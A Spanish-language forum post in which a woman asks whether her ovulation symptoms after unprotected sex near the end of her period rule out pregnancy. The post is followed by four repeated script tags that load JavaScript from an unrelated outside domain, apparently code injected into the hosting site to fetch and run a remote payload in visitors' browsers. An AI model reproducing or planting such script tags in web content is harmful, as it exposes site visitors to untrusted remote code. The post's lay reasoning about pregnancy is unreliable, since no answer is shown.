Me pasaría esto si estuviera embarazada
En el último día de regla tuve una relación, sin condón. Él estaba seco y no eyaculó, estuvimos poco tiempo y cuando paramos él seguía seco, no llegó a expulsar líquido preseminal, recuerdo que incluso a él le dolía por falta de lubricación. Ahora, en la fecha en la que tengo que ovular, efectivamente noto lo que noto siempre durante la ovulación, tengo flujo, etc. ¿Es seguro que esto es ovulación? Yo no noto nada raro, excepto un pequeño dolor, tal vez por los nervios, pero durante la ovulación a veces me viene ese dolor, o sea que nada raro. Si estuviese embarazada, no tendría estos síntomas de la ovulación, ¿verdad? Y si estuviese embarazada, no se produciría ovulación, supongo. Por lo que he contado, no es probable que esté embarazada, ¿no? La verdad me preocupa mucho esa idea y si en algún momento notase algo raro, seguramente sería por los nervios.
<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>